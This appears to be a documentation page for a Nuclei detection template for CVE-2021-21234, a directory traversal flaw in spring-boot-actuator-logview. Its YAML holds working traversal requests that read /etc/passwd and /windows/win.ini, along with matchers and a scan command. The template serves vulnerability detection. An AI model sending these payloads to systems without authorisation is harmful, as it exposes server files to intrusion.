Spring Boot Actuator Logview Directory Traversal
ID: CVE-2021-21234
Severity: high
Author: gy741,pikpikcu
Tags: cve2021,cve,springboot,lfi,actuator,spring-boot-actuator-logview_project
Description
Section titled “Description”spring-boot-actuator-logview before version 0.2.13 contains a directory traversal vulnerability in libraries that adds a simple logfile viewer as a spring boot actuator endpoint (maven package “eu.hinsch:spring-boot-actuator-logview”.
YAML Source
Section titled “YAML Source”id: CVE-2021-21234
info: name: Spring Boot Actuator Logview Directory Traversal author: gy741,pikpikcu severity: high description: | spring-boot-actuator-logview before version 0.2.13 contains a directory traversal vulnerability in libraries that adds a simple logfile viewer as a spring boot actuator endpoint (maven package "eu.hinsch:spring-boot-actuator-logview". impact: | This vulnerability can lead to unauthorized access to sensitive information stored on the server. remediation: | Apply the latest security patches or upgrade to a patched version of Spring Boot Actuator. reference: - https://blogg.pwc.no/styringogkontroll/unauthenticated-directory-traversal-vulnerability-in-a-java-spring-boot-actuator-library-cve-2021-21234 - https://github.com/cristianeph/vulnerability-actuator-log-viewer - https://nvd.nist.gov/vuln/detail/CVE-2021-21234 - https://github.com/lukashinsch/spring-boot-actuator-logview/commit/760acbb939a8d1f7d1a7dfcd51ca848eea04e772 - https://github.com/lukashinsch/spring-boot-actuator-logview/commit/1c76e1ec3588c9f39e1a94bf27b5ff56eb8b17d6 - https://blog.csdn.net/qq_39583774/article/details/123023770#t5 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N cvss-score: 7.7 cve-id: CVE-2021-21234 cwe-id: CWE-22 epss-score: 0.96732 epss-percentile: 0.99659 cpe: cpe:2.3:a:spring-boot-actuator-logview_project:spring-boot-actuator-logview:*:*:*:*:*:*:*:* metadata: max-request: 4 vendor: spring-boot-actuator-logview_project product: spring-boot-actuator-logview tags: cve2021,cve,springboot,lfi,actuator,spring-boot-actuator-logview_project
http: - method: GET path: - "{{BaseURL}}/manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../" - "{{BaseURL}}/log/view?filename=/windows/win.ini&base=../../../../../../../../../../" - "{{BaseURL}}/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../" - "{{BaseURL}}/log/view?filename=/etc/passwd&base=../../../../../../../../../../"
stop-at-first-match: true
matchers-condition: or matchers: - type: dsl dsl: - "contains(header,'text/plain')" - "regex('root:.*:0:0:', body)" - "status_code == 200" condition: and
- type: dsl dsl: - "contains(header,'text/plain')" - "contains(body, 'bit app support')" - "contains(body, 'fonts')" - "contains(body, 'extensions')" - "status_code == 200" condition: and# digest: 490a00463044022039289032ba83d0ecd5879312daf61ef82fed3b155f5ee31366700a63ec2989fd0220706a4f74f7981c818274396e790762a79a9705125251b851e13f4dbac6c8b269:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-21234.yaml"